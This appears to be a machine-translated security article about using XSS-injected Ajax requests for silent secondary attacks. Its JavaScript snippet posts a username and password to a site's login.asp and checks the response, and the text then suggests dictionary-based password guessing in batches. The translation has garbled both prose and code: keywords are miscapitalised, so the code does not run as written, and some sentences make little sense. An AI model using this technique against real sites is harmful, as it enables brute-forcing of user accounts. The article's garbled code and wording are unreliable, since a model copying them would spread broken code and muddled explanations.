Author: cosine
Source: 0x37 Security
Ajax allows the data to be carried out silently in the background. If you have a way to make your JS script in the same domain as this Ajax module, you can use this XSS to perform secondary attacks, the status attribute of the xhr object can be used to determine whether the returned result is correct or not. Get Ajax directly constructs the parameter values in the URL; post Ajax constructs the parameter values in the send method of the xhr object.
Generally, Ajax attacks are hard to be noticed by users unless we want them to be noticed. The firebug plug-in Firefox can analyze all actions of xhr:
How to modularize Ajax WebProgramWhat about security detection?
Although Ajax cannot directly transmit data across domains, You can transmit data with the target Ajax module in the local region. Take my to do/project as an experiment, as shown below:Code:
<SCRIPT type = "text/JavaScript" src = "http://www.0x37.com/Project/js/ajax.js"> </SCRIPT>
<SCRIPT>
Alert (_ x)
Function check_login (){
VaR up = "up =" + escape ('cosine ') + "|" + "1234567 ";
_ X. Open ("Post", "http://www.0x37.com/Project/login.asp", true );
_ X. setRequestHeader ("Content-Type", "application/X-WWW-form-urlencoded ");
_ X. onreadystatechange = function (){
If (_ x. readystate = 4 ){
If (_ x. Status = 200 ){
Alert (_ x. responsetext );
}
}
}
_ X. Send (up );
}
Check_login ();
// Logout ();
</SCRIPT>
After you submit this code locally, it will be associated with the login on the 0x37 project. ASP files are used for communication. The role of ASP files is to guess the user name and password, and determine whether the password is correct based on the returned value. If there is a dictionary, you can guess the password in batches. This communication is normal. The malicious value we constructed is injected in this Ajax box. Of course, we can also directly inspect the target URL in Ajax. Although Ajax hides many server-side files, this does not indicate that these server-side files are secure and may expose more serious problems.